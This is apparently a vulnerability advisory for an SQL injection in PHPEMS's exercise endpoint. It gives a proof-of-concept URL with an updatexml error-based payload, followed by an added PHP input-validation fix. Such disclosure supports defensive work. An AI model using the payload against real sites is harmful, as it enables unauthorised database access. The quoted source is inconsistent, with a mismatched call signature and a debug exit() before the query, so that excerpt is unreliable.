### Summary: An SQL injection vulnerability in PHPEMS

### Details:

9. PHPEMS has an SQL injection vulnerability

The injectable code is in the `exercise()` function of `/app/exam/phone.php`, at line 695:

```php
$questionids = $this->question->selectQuestionsByKnows($args['knowsid'],$args['number'],$args['questid']);
```

Tracing the three parameters back:

```php
if($this->ev->get('setExecriseConfig')){
    $args = $this->ev->get('args');
    ...
```

all of them are user-controlled. Inside the function:

```php
public function selectQuestionsByKnows($knowsid,$qt)
{
    print "start"; // debug output present in the pasted excerpt
    $knowsids = $knowsid; // taken as-is, no validation or escaping
    foreach($qt as $key => $t)
    {
        $par = 0;
        if(!$par)
        {
            $par++;
            $trand = rand(1,4);
            if($trand < 3)
            {
                print "hello";exit(); // debug output present in the pasted excerpt
                // $knowsids, $key and $t are all interpolated straight into SQL fragments
                $qrs = $this->getRandQuestionRowsList(array("quest2knows.qkknowsid IN ({$knowsids})","questionrows.qrtype = '{$key}'","questionrows.qrnumber <= '{$t}'"));
                if(count($qrs))
                {
                    $qrid = $qrs[array_rand($qrs,1)];
                    $questionrow[$key][] = $qrid;
                    $qr = $this->exam->getQuestionRowsByArgs("qrid = '{$qrid}'");
                    $t = intval($t - $qr['qrnumber']);
                }
            }
        }
    }
    // the excerpt in the report ends here; the closing braces above were added for balance
}
```

As can be seen, the parameter `$knowsids` is concatenated into the database query without any processing, which results in an SQL injection vulnerability.

Verification method:

Register a user and log in, then visit:

```
localhost/ems/index.php?exam-phone-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1)
```

![xxx.png](https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png)

OK, verification succeeded.

### Proof of vulnerability:

Register a user and log in, then visit:

```
localhost/ems/index.php?exam-phone-exercise&setExecriseConfig=1&args[knowsid]=1,updatexml(1,user(),1)
```

![xxx.png](https://images.seebug.org/upload/201503/12185158cad6f42c30537abb31f709e9eb381f04.png)

OK, verification succeeded.
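The root cause in the details section above is that `$knowsids`, `$key` and `$t` reach the `IN (...)`, `qrtype = '...'` and `qrnumber <= '...'` fragments without validation. The following is an added example of the hardened counterpart, not PHPEMS code: it validates the `knowsid` list as plain integers and constrains the other two values before any SQL fragment is built. The function names, the question-type whitelist and the sample inputs are assumptions made for this example; the real fix should additionally go through the application's database layer with bound parameters, which the report does not show.

```php
<?php
// Added example, not PHPEMS code: validate the inputs that phone.php's exercise()
// passes into selectQuestionsByKnows() before they can reach SQL string building.
// Function names and the allowed question-type codes are illustrative assumptions.

/**
 * Turn a user-supplied knowsid value (string "1,2,3" or array) into a list of
 * distinct non-negative integers. Anything that is not a bare digit string is
 * rejected, so a payload such as "1,updatexml(1,user(),1)" never reaches the query.
 */
function normalizeKnowsIds($raw): array
{
    $parts = is_array($raw) ? $raw : explode(',', (string)$raw);
    $ids = [];
    foreach ($parts as $p) {
        $p = trim((string)$p);
        // ctype_digit accepts only [0-9]+: no sign, spaces, quotes or parentheses
        if ($p === '' || !ctype_digit($p)) {
            throw new InvalidArgumentException('knowsid must be a comma-separated integer list');
        }
        $ids[] = (int)$p;
    }
    if (count($ids) === 0) {
        throw new InvalidArgumentException('knowsid list is empty');
    }
    return array_values(array_unique($ids));
}

/**
 * Build the three conditions the vulnerable code interpolates, but only from
 * validated values: $knowsIds is an integer list, $qrtype is checked against a
 * fixed set of type codes (assumed here), and $qrnumber is forced to an integer.
 */
function buildQuestionConditions(array $knowsIds, string $qrtype, $qrnumber): array
{
    static $allowedTypes = ['1', '2', '3', '4']; // assumed type codes; adjust to the real schema
    if (!in_array($qrtype, $allowedTypes, true)) {
        throw new InvalidArgumentException('invalid question type');
    }
    $n = (int)$qrnumber;
    if ($n < 0) {
        throw new InvalidArgumentException('qrnumber must be non-negative');
    }
    return [
        'quest2knows.qkknowsid IN (' . implode(',', $knowsIds) . ')',
        "questionrows.qrtype = '{$qrtype}'",
        "questionrows.qrnumber <= {$n}",
    ];
}

// Constructed sample inputs: a benign list, the report's injection payload,
// and a sloppy but legitimate list with whitespace and a duplicate.
$samples = ['1,2,3', '1,updatexml(1,user(),1)', ' 7 , 7 , 8 '];
foreach ($samples as $s) {
    try {
        $ids = normalizeKnowsIds($s);
        print_r(buildQuestionConditions($ids, '2', '5'));
    } catch (InvalidArgumentException $e) {
        echo "rejected \"{$s}\": {$e->getMessage()}\n";
    }
}
```

Run with `php hardened_knowsid.php`: the first and third samples produce integer-only `IN (...)` fragments (the third collapses to `IN (7,8)`), while the second is rejected before any SQL text is assembled. Casting the list to integers is sufficient for an `IN` clause of numeric ids; for the string-typed `qrtype` column the whitelist is what prevents quote-breaking, and a prepared statement with bound parameters remains the preferred general fix.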